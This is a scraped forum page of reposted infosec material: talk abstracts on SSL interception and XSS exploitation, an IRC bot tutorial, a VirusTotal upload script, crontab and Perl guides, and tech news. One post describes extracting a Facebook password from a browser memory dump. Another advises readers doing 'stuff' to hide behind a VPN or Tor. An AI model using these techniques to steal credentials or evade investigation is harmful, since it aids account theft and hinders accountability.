    Securing The Ssl Channel Against Man-In-The-Middle Attacks Description: Abstract In the last year, 2011, major trusted CAs providing trusted certificates for SSL/TLS in browser scenarios were compromised (e.g. as seen in the Diginotar breach) and based on the current trust models (trusting all registered CAs equally for all domains) exposed vital web applications to the risk of man-in-the-middle attacks. Several approaches are currently discussed to mitigate this risk. The most advanced and closest to final adoption being the technologies discussed by the browser vendors at the recent IETF Web Security working group meetings: HSTS and pinning of certificates. To better protect content providers against the distribution of bogus certificates, an HTTP header extension containing a fingerprint of their certificates linked to a domain address has been defined. This approach, which has been partly tested in Chrome, and already helped identify and protect to some extend Google's web application in the recent Diginotar compromise. Chrome users were able to detect the bogus DigiNotar certificates because Chrome had embedded the hashes of valid Google certificates. Back in July 2011, the hacked DigiNotar certificate authority (CA), which has since gone out of business, was used to issue more than five hundred bogus certificates for companies including Google and various intelligence services. The presented technologies are cutting edge and although the specification is not final yet, they are in their final stages and currently in roll-out and ready to be used. Other models that compete or complement this approach shall also be discussed (DNSSEC, etc. ). ***** Speaker: Tobias Gondrom, Managing Director, Thames Stanley: Information Security and Risk Management Advisory Passionate about: OWASP, Application Security (yeah!), CISO training, information security & risk management in global organisations, IETF, info sec research (!), ... Tobias Gondrom is Managing Director of Thames Stanley, a CISO and Information Security & Risk Management Advisory based in Hong Kong, United Kingdom and Germany. He has fifteen years of experience in software development, application security, cryptography, electronic signatures and global standardisation organisations working for independent software vendors and large global corporations in the financial, technology and government sector, in America, EMEA and APAC. As the Global Head of the Security Team at Open Text (2005-2007) and from 2000-2004 as the lead of the Security Task Force at IXOS Software AG, he was responsible for security, risk and incident management and introduced and implemented a secure SDLC used globally by development departments in the US, Canada, UK and Germany. Since 2003 he is the chair of working groups of the IETF (ietf.org) in the security area, member of the IETF security directorate, and since 2010 chair of the formed web security WG at the IETF, and a former chapter lead of the German OWASP chapter from 2007 to 2008, and currently board member of OWASP London and member of the OWASP Global Industry Committee. Tobias is the author of the international standards RFC 4998 and RFC 6283 (Evidence Record Syntax) and co-author and contributor to a number of internet standards and papers on security and electronic signatures, as well as the co-author of the book „Secure Electronic Archiving“ (ISBN 3-87081-427-6), and frequent presenter at conferences and publication of articles (e.g. AppSec, IETF, ISSE, Moderner Staat, VOI-booklet “Electronic Signature“, iX). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Securing the SSL channel against man-in-the-middle attacks - Tobias Gondrom on Vimeo Sursa: Securing The Ssl Channel Against Man-In-The-Middle Attacks
  7. Nytro
    Reverse Engineering Secure Http Api's With An Ssl Proxy Description: Abstract The proliferation of mobile devices has led to increased emphasis on native applications, such as Objective-C applications written for iOS or Java applications written for Android. Nonetheless, these native client applications frequently use HTTP APIs to communicate with a backend server. In addition, browser-based applications are growing more complex, and are also more likely to make asynchronous calls to HTTP APIs. In this presentation, we walk through a common (but insecure) method of securing HTTP APIs with SSL. As we will demonstrate, properly configured SSL will protect a protocol from eavesdropping (man-in-the-middle attack) but will not protect that protocol from the end user himself. In particular, we demonstrate how an end user can use an SSL proxy to decrypt and reverse engineer the HTTP API. We will show a hypothetical HTTP API over SSL that tracks high scores for games. Then we will demonstrate an attack on that HTTP API using mitmproxy, an open source SSL proxy, to show how an attacker can forge a high score, even though the protocol is tunneled over SSL. We will then demonstrate a modified HTTP API that is resistant to this type of attack. Finally, we will wrap up by discussing other applications of SSL proxies to web application security testing, such as analyzing HTTP APIs to see if any personal information – such as a user’s address book – are being transmitted over the API. This is the same technique used by researcher Arun Thampi in February 2012 to determine that the Path application on iOS was secretly uploading users’ contacts to its HTTP API. ***** Speakers Alejandro Caceres, Computer Network Operations Engineer, Lunarline Inc. I am a computer network operations engineer focused on building software products and interested in breaking things, mostly. I've been told I have a "hacker" mindset by my co-workers (I like to think that they meant it in a good way) and that is entirely true. I work on a number of open source projects related to pen testing and particularly enjoy dealing with unique ways of automating exploitation of web applications. Mark Haase, Sr. Security Software Engineer, Lunarline, Inc. I've been writing software since I was 13, writing software as a job since Junior year of college, and working professionally as a software engineer since I graduated in financial services and then information security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Reverse Engineering Secure HTTP API's With an SSL Proxy - Alejandro Caceres and Mark Haase on Vimeo Sursa: Reverse Engineering Secure Http Api's With An Ssl Proxy
  8. Nytro
    Dumping Memory Password Using Task Manager Description: This video is about dumping the memory contents of a process using task manager. In this video i have extracted a facebook account's password from browser memory dump using winhex. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dumping Memory Password Using Task Manager
  9. Nytro
    [h=1]Event driven socket programming[/h]Author: [h=3]nslay[/h]I've been working on a fully featured IRC bot for a couple months on/off and I usually write my own IO multiplexer. This time, however, I gave libevent a try and decided to share my experiences. libevent Anyway, if you're not familiar with event-driven design and you're interested in socket programming, I strongly recommend you learn about event driven programming first since it tends to make socket programming easier and more flexible. Then employ something like libevent (or write your own) that allows you to hook IO events for sockets. You'll find that your code Generalizes to multiple sockets with no effort (and no threads) Often implicitly supports timers with no effort (depending on the underlying polling mechanism you use) Generalizes to multiple protocols (since you can just hook protocol-dependent handlers per socket) Seamlessly integrates with OOP well (rather than have one object that has a blocking recv() loop, just implement an OnRead() method and support multiple objects simultaneously!) Anyway, here's my IRC bot. It is fully featured, though since it's a replica of something written in ~1998, doesn't have cool features like searching wikipedia (for example). http://sourceforge.n...rojects/ircbnx/ To see examples of event driven design, look at IrcClient.cpp and BnxDriver.cpp. Specific snippits are included below. Relevant snippits from IrcClient.cpp Here's a nifty trick to dispatch C callbacks to C++ member functions (I learned this trick from here) template<void (IrcClient::*Method)(evutil_socket_t, short)> static void Dispatch(evutil_socket_t fd, short what, void *arg) { IrcClient *pObject = (IrcClient *)arg; (pObject->*Method)(fd, what); } You can redirect C callbacks to your C++ member functions. In this case, I use it dispatch C callbacks to the following basic IO/timer functions: // Libevent callbacks void OnWrite(evutil_socket_t fd, short what); void OnRead(evutil_socket_t fd, short what); void OnSendTimer(evutil_socket_t fd, short what); You can use the basic Read/Write events to determine When a socket has completed a connection (OnWrite() is called) Receiving data (OnRead() is called and recv() returns > 0) When the remote host has closed the connection (OnRead() is called and recv() returns 0) Here's how you do it in an event driven framework. Here is IrcClient::Connect() First create the socket: bool IrcClient::Connect(const std::string &strServer, const std::string &strPort) { if (m_socket != INVALID_SOCKET) Disconnect(); m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (m_socket == INVALID_SOCKET) { Log("socket failed (%d): %s", errno, strerror(errno)); return false; } Next, set it to non-blocking. Non-blocking means that connect() and recv() will never put the process to sleep until the request has completed. It's easy to understand why you want this in the context of multiple connections. If you are handling 50 sockets, and you do not enable non-blocking I/O, then mishandling just one of those sockets causes the process to hang (and the other 49 sockets will not receive service until a request has completed one that one socket). #ifdef _WIN32 u_long opt = 1; if (ioctlsocket(m_socket, FIONBIO, &opt) != 0) { Log("ioctlsocket failed (%d)", WSAGetLastError()); CloseSocket(); return false; } #else // _WIN32 int flags = fcntl(m_socket, F_GETFL); if (fcntl(m_socket, F_SETFL, flags | O_NONBLOCK) == -1) { Log("fcntl failed (%d): %s", errno, strerror(errno)); CloseSocket(); return false; } #endif // !_WIN32 In this code, I use getaddrinfo() to resolve hostnames. It is more flexible and hides the hackish way you normally resolve a hostname and setup a sockaddr. struct addrinfo hints, *pResults = NULL; memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_PASSIVE; hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; int e = getaddrinfo(strServer.c_str(), strPort.c_str(), &hints, &pResults); if (e != 0) { Log("getaddrinfo failed (%d): %s", e, gai_strerror(e)); CloseSocket(); return false; } Now we connect the socket. It will most likely fail with EAGAIN or WSAEWOULDBLOCK depending on platform. These mean the connection in progress and not yet completed and so you must treat these as not errors. // NOTE: Cast to socklen_t since Windows make ai_addrlen size_t e = connect(m_socket, pResults->ai_addr, (socklen_t)pResults->ai_addrlen); #ifdef _WIN32 int iLastError = WSAGetLastError(); if (e != 0 && iLastError != WSAEWOULDBLOCK) { Log("connect() failed (%d)", iLastError); CloseSocket(); freeaddrinfo(pResults); return false; } #else // _WIN32 if (e != 0 && errno != EINPROGRESS) { Log("connect() failed (%d): %s", errno, strerror(errno)); CloseSocket(); freeaddrinfo(pResults); return false; } #endif // !_WIN32 freeaddrinfo(pResults); Now, we create our event contexts and hook them. The write event is only meant to be triggered once to determine connectivity, hence EV_PERSIST is missing. Our read event is intended to be used to receive data and is set to EV_PERSIST. The last created event is a timer for send queues. We only initially need to hook OnWrite() since we need to determine when the connect() has actually completed. Once it completes, we can then hook OnRead() and OnSendTimer(). Notice the use of the templated Dispatch() function. Nifty huh? // XXX: Handle errors? m_pWriteEvent = event_new(m_pEventBase, m_socket, EV_WRITE, &Dispatch<&IrcClient::OnWrite>, this); m_pReadEvent = event_new(m_pEventBase, m_socket, EV_READ | EV_PERSIST, &Dispatch<&IrcClient::OnRead>, this); m_pSendTimer = event_new(m_pEventBase, -1, EV_PERSIST, &Dispatch<&IrcClient::OnSendTimer>, this); event_add(m_pWriteEvent, NULL); m_strCurrentServer = strServer; m_strCurrentPort = strPort; return true; } Now here's OnWrite(). First it hooks OnRead() and then it sets up the send queue timer to run in 0.5 second increments. Because the write event was not created with EV_PERSIST, it will only trigger once. void IrcClient::OnWrite(evutil_socket_t fd, short what) { event_add(m_pReadEvent, NULL); // TODO: Tunable for send timer struct timeval tv; tv.tv_sec = 0; tv.tv_usec = 500000; event_add(m_pSendTimer, &tv); m_clSendCounter.SetTimeStep(0.5f); OnConnect(); } And finally, here's OnRead() which constructs lines (since SOCK_STREAM sockets may produce fragmented data). If there are unexpected problems (such as remote host closing connection), then it dispatches said events. void IrcClient::OnRead(evutil_socket_t fd, short what) { #ifdef _WIN32 int readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, (int)(sizeof(m_stagingBuffer)-1-m_stagingBufferSize),0); #else // _WIN32 ssize_t readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, sizeof(m_stagingBuffer)-1-m_stagingBufferSize,0); #endif // !_WIN32 if (readSize == 0) { Log("Remote host closed the connection."); OnDisconnect(); return; } else if (readSize < 0) { Log("recv() failed (%d): %s", errno, strerror(errno)); OnDisconnect(); return; } time(&m_lastRecvTime); m_stagingBufferSize += readSize; m_stagingBuffer[m_stagingBufferSize] = '\0'; char *p, *q; p = q = m_stagingBuffer; // We check the buffer size since Disconnect() can be called somewhere in ProcessLine() while (m_stagingBufferSize > 0 && (q = strpbrk(p,"\r\n")) != NULL) { *q = '\0'; m_stagingBufferSize -= (q-p) + 1; if (q != p) ProcessLine(p); p = q + 1; } memmove(m_stagingBuffer, p, m_stagingBufferSize); } Relevant snippits from BnxDriver.cpp Lastly, you need to actually dispatch the events. libevent makes this very simple. Here's BnxDriver::Run(). Notice that it can seamlessly handle multiple BnxBot objects with just one thread. bool BnxDriver::Run() { if (!Load()) return false; struct event_base *pEventBase; pEventBase = event_base_new(); for (size_t i = 0; i < m_vBots.size(); ++i) { m_vBots[i]->SetEventBase(pEventBase); m_vBots[i]->StartUp(); } event_base_dispatch(pEventBase); event_base_free(pEventBase); return true; } Conclusion For socket programming, you should definitely seek an event-driven design for simplicity and scalability. Enjoy. If you want to see the code, check the repository or download the source zip. It's too big to paste here. http://sourceforge.n.../85/tree/trunk/ http://sourceforge.n...s/ircbnx/files/ Sursa: Event driven socket programming - rohitab.com - Forums
  10. Nytro
    [h=3]YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal[/h] Finished automation of a process to upload samples from multiple trackers. Hope You can add it to Your systems and daily jobs. History, requirements and installation – see here Link to get – YAPS.py don’t forget to remove _.txt ) What added: 1. Added check of sample, if it already present on VirusTotal database. If so – just data dumped to log 2. If sample not present – it uploaded to VirusTotal. 3. All info about samples: Is sample new, SHA256 hash, detect ratio and URL to review – dumped to vtlog.txt at same dir 4. Comments added – in case You need to comment samples. by default enabled on already detected samples. Edit comment variable if needed. Currently there is a problem to comment just submitted file – will be solved. 5. All this within ToS of VirusTotal and thx to them for good tool Hope it useful not to me Stay Safe D.L. #!/usr/bin/python # # Script to upload samples to VT via API # ver 0.3 # # Require: # * Requests python library - grab here http://docs.python-requests.org/en/latest/ # Usage: # python yaps.py path/to/malware.exe # Wildcard: # python yaps.py path/to/* or path/to/*.exe etc # # Variables: # api_key - take Your API from Virustotal # comment2add - comment that added to sample, in case You upload bunch of simular samples # # By Denis Laskov @it4sec http://ondailybasis.com # # Special thx: # @joelverhagen for hashing function sample import requests, sys, fileinput, time, hashlib api_key = '' #public API from VT comment2add = '#Malware ' if api_key == '': print 'API Key is empty. Go at www.virustotal.com and past one at api-key var' SHA = '' headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; uploaded by YAPS.py @it4sec)'} url = 'https://www.virustotal.com/vtapi/v2/file/scan' #URL to submit files url2 = 'https://www.virustotal.com/vtapi/v2/file/report' #URL to review reports url3 = 'https://www.virustotal.com/vtapi/v2/comments/put' #URL to submit comments post_data1 = {'apikey': api_key} def sha256sum_f(filePath): # SHA256 function fh = open(filePath, 'rb') m = hashlib.sha256() while True: data = fh.read(8192) if not data: break m.update(data) return m.hexdigest() def upload_f(filePath): # Upload sample func file2send = {'file': open(filePath, 'rb')} r = requests.post(url, post_data1, files=file2send, headers=headers) #print r.json return r.json def VTcheckl_f(hash_value): #check VT status of sample post_data2 = {'resource': SHA, 'apikey': api_key} print 'Checking: ', fileinput.filename(), ' sha256: ', SHA #print post_data2 r = requests.post(url2, post_data2, headers=headers) return r.json def timer_f(): # timer of 15 seconds to stay within VT API ToS print 'Waiting 15 seconds to comply VT ToS' time.sleep(15) def Report_f(isnew, json): # Func to write to report n = open('./vtlog.txt', 'a') n.write ('\n\nAlready reported: ' + str(isnew)) n.write ('\nFilename: ' + str(fileinput.filename())) n.write ('\nsha256: ' + str(json['sha256'])) try: n.write ('\nDetection Ratio: ' + str(json['positives']) + '/' + str(json['total'])) except KeyError: n.write ('\nDetection Ratio: Unknown' ) pass n.write ('\nURL: ' + str(json['permalink'])) n.close def Comment_f(SHAsum): post_data3= {'resource': SHA, 'apikey': api_key, 'comment': comment2add} r = requests.post(url3, post_data3, headers=headers) for line in fileinput.input(): SHA = sha256sum_f(fileinput.filename()) response = VTcheckl_f(SHA) status = response['response_code'] if status == 0: print 'New sample: ', fileinput.filename(), ' uploading' timer_f() newstatus = upload_f(fileinput.filename()) Report_f('No', newstatus) #Comment_f(SHA) if status != 0: print 'Sample ', fileinput.filename(), ' already known or in process' Report_f('Yes', response) Comment_f(SHA) timer_f() fileinput.nextfile() Sursa: Day by day… | YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal
  11. Nytro
    [h=2]How to: Use crontab to schedule tasks[/h]Sunday, January 06, 2013 If you want to schedule to run a command or script periodically, crontab will be a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is: sudo crontab -e On my Arch Linux box, the default text editor is "vi" but on Linux Mint, when you run this command the first time, you will be asked to choose a text-editor. And similarly, the crontab file of Arch Linux is pure blank when the one of Linux Mint has many useful comment lines for you to understand how to use crontab. Here is the how the crontab file looks on Linux Mint (the text editor is nano ): The comment lines in the image above explain quite well about how to use crontab. The format to schedule a task with crontab is: * * * * * /any/command/or/script As you can see, there are 5 stars ( with a space between 2 stars) and each star represents one part of the date format in the following order: - minute ( value = 0 -> 59) - hour ( 0 -> 23) - day of month ( 1 -> 31) - month ( 1 -> 12) - day of week ( 0 -> 6 with 0 = Sunday) In short, to set a certain period to run a script, you just need to replace each star with a specific value. Note: If you dont need to set any value for a star, just leave the star in the command. A star means "every" so a command with all 5 stars will mean to run a task every minute until you delete this command from the crontab schedule. For example, to run a script at 7:00 AM on every Monday in the first three months of the year, the command will be: 0 7 * 1-3 1 /path/to/the/script As you can see, crontab is quite flexible with it format. You can use 1-5 in the day of week value to schedule a task to be run on work days. Or to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day of week value. For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, Feb, May and Oct, the command will be: 0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script Crontab also has some special keywords for you to use: @reboot at startup @yearly once a year @annually ( == @yearly) @monthly once a month @weekly once a week @daily once a day @midnight ( == @daily) @hourly once an hour If you use the keywords, you dont need to use the stars. For example, to run a script once everyday, the command will be: @daily /path/to/the/script And after you insert the right command the crontab file, just save the file and everything is scheduled now. To check the task you have scheduled with crontab, the command to use will be: sudo crontab -l Sursa: How to: Use crontab to schedule tasks ~ Linux and Life
  12. Nytro
    16 of the Best Free Perl Books Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license. Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister. Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming. One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules. The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing. [TABLE=width: 100%] [TR] [TD=colspan: 2] 1. Modern Perl [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.onyxneon.com/books/modern_perl/index.html[/TD] [/TR] [TR] [TD]Author[/TD] [TD]chromatic[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, A4 PDF, HTML, ePub[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]204[/TD] [/TR] [/TABLE] Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed. Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code. This book providing a wealth of information on: The Perl Philosophy Perl and its Community focusing on CPAN, community and development sites The Perl Language introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures Operators - a series of one or more symbols used as part of the syntax Functions - a discrete, encapsulated unit of behaviour Regular Expressions and Matching - the use of these expressions gives Perl its incredible text processing power Objects - discrete, unique entities with their own identities Style and Efficacy explaining the importance of writing maintainable, idiomatic, and effective Perl Managing Real Problems covering testing, handling warnings, files, modules, distributions, and more Perl Beyond Syntax What to Avoid The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. 2. Beginning Perl [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.perl.org/books/beginning-perl/[/TD] [/TR] [TR] [TD]Author[/TD] [TD]Simon Cozens[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, HTML[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]672 [/TD] [/TR] [/TABLE] Beginning Perl is a book which as its name suggest is written for individuals that are new to programming who want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully through up to complex operations such as using Perl as a CGI language. The book covers the following topics: Installing Perl on Windows and UNIX Making use of online Perl resources like CPAN First principles in programming and the Perl syntax Working with simple values Lists and Hashes Loops and Decisions Regular Expressions Working with files and databases Writing web pages in Perl Subroutines Running and Debugging Perl Modules Using Perl as an object-oriented language Perl and Databases The World of Perl The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License. Restul cartilor: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html
  13. Nytro
    [h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7 [/h]by Derek Kessler Mon, 31 Dec 2012 1:05 pm EST As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premiere launch devices for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure. Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus, so a lot of the work put into the smartphone project could be easily translated to the Nexus 7. How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college. The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project. A video of the port in action is after the break, and as an early alpha we're rather impressed. Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7 and more open source-y. Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing. The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next. Sursa: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation
  14. Nytro

    Fun stuff

    Nytro replied to Wisa's topic in Discutii non-IT

    http://www.youtube.com/watch?v=w9X1CP_jF6k
  15. Nytro
    Si daca de exemplu folosesc autoruns? Sau alte 20 de utilitare?
  16. Nytro

    Smartmeter

    Nytro posted a topic in Tutoriale video

    Smartmeter Description: SMARTMETER A technological overview of the German roll-out This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany. SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planed roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi) which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication related details of whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smartmeter
  17. Nytro
    At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2 Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2 Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2
  18. Nytro
    [h=1]Cum vor sa castige bani retelele sociale precum Facebook[/h] Acoperirea a milioane de consumatori (potentiali clienti) Exista numeroase moduri de a ajunge la un anumit public in marketing. Printre acestea, se numara formularea unui chestionar pentru o cunoastere consolidata a propriei clientele si a mediilor in care sa faceti publicitate produsului dumneavoastra pentru a-l vinde cel mai bine. De exemplu, daca vindeti un tractor nou pentru o ferma agricola, ii veti face publicitate intr-o revista cumparata cu predilectie de fermieri. Astfel, acoperiti un segment de piata care va asigura cel mai mare volum de vanzari. Internetul et cookie-urile Daca detin un software care analizeaza frecventa operatiunilor de cumparare de catre fermieri pentru un anumit teritoriu... de exemplu, pot lansa cookie-uri pe un site web de vanzari online de tractoare pentru a inregistra de unde provin persoanele care viziteaza site-ul, care vand sau cumpara aceste tractoare, etc.. Ti-as putea spune, daca ai recurs la serviciile mele, la ce targ agricol ar trebui sa mergi pentru a avea cele mai mari sanse sa iti vinzi tractoarele. Asta pentru ca cookie-urile mele au detectat numerosi clienti potentiali in zona respectica. Cat ai fi dispus sa platesti pentru un astfel de serviciu de marketing? Investitiile pentru gasirea unor potentiali clienti s-ar reduce enorm, intrucat nu trebuie sa angajezi o armata de vanzatori care sa prospecteze piata in ani si ani de zile. Astfel, Facebook si retelele de socializare in general utilizeaza astfel de cookie-uri, sau ar putea sa le utilizeze pentru a gasi cumparatorii (cumparatoarele) unor diverse produse, indiferent ca sunt de lux ori produse de uz zilnic. Iar intreprinderile nu ar trebui decat sa cumpere aceste liste. Astfel de liste sunt disponibile in agentii de publicitate din intreaga lume. Acestea au un pret initial care variaza in functie de piata pe care doresti sa o abordezi. Cu cat lista este mai specializata, cu atat crearea acesteia costa mai mult, si pretul de vanzare este mai mare. O lista de baza, precum nume, prenume, adresa, nr. de telefon, etc., costa aproximativ 40 de dolari pentru 1000 de clienti potentiali, in SUA. O lista cu informatii precum activitatile exercitate, orasul de resedinta, numarul de proprietati dobandite de-a lungul vietii, stilul de viata al cumparatorilor, etc., are un pret mediu de aproximativ 120 de dolari pentru 1000 de clienti potentiali, tot in SUA. In prezent, Facebook merge si mai departe, datorita cookie-urilor si a obiceiurilor de cumparare ale consumatorilor. Aceasta va permite stabilirea ca tinta precisa a milioane de persoane, cu o fiabilitate marita cu 500%, intrucat Facebook poate utiliza un program software de recunoastere a cuvintelor de pe site-ul propriu. De exemplu, programul software poate urmari toate persoanele care au folosit cuvantul Mercedes Benz in postarile lor. Facebook va putea stabili astfel o lista de marketing extrem de precisa. Si bineinteles, pretul unei astfel de liste creste. Imaginati-va ca sunteti pe Facebook, discutati cu fratele ori cu un cumnat, si spuneti la un moment dat: „Da, ma gandesc sa cumpar o masina noua, un Mercedes Benz, in vreo doua zile”. Programul software recupereaza numele dumneavoastra, numele de utilizator, orasul in care locuiti, activitatea profesionala exercitata si orice alte informatii pertinente pentru a-si da seama de la ce firma de vanzare de automobile ati putea cumpara masina. Un reprezentant Facebook va suna la respectiva firma si va conveni cu aceasta sa ii furnizeze aceste informatii contra unei sume de bani. Dumneavoastra veti primi un telefon de la firma de automobile in cauza, care va invita sa profitati de o oferta de nerefuzat… Si uite-asa avem un tip de marketing cu o tinta extrem de precisa. Iar aceasta practica va aduce un venit de miliarde de dolari retelei Facebook. O astfel de lista poate ajunge la 2500 pana chiar la mai mult de 5000 de dolari pentru 1000 de clienti potentiali, inmultit, evident, cu numarul de utilizatori de Facebook. Evident, Facebook va stabili, de asemenea, asocieri, legaturi cu alte site-uri, va recomanda membrilor cumparaturi, prin intermediul altor site-uri, si altele de acest gen (marketing indirect). Iti poti face macar o cat de mica idee de bogatia pe care o detine aceasta companie. Iar acest proces urmeaza sa fie implementat de toate retelele sociale care exista in prezent pe web. Sursa: Cum vor sa castige bani retelele sociale precum Facebook
  19. Nytro
    [h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h] Daca tot faceti "chestii", nu va riscati. Folositi cel putin VPN (ca cele de aici). Daca nu e ok, atunci Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/
  20. Nytro
    When the cops subpoena your Facebook information, here's what Facebook sends the cops NU e noua informatia, dar mi se pare utila. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which 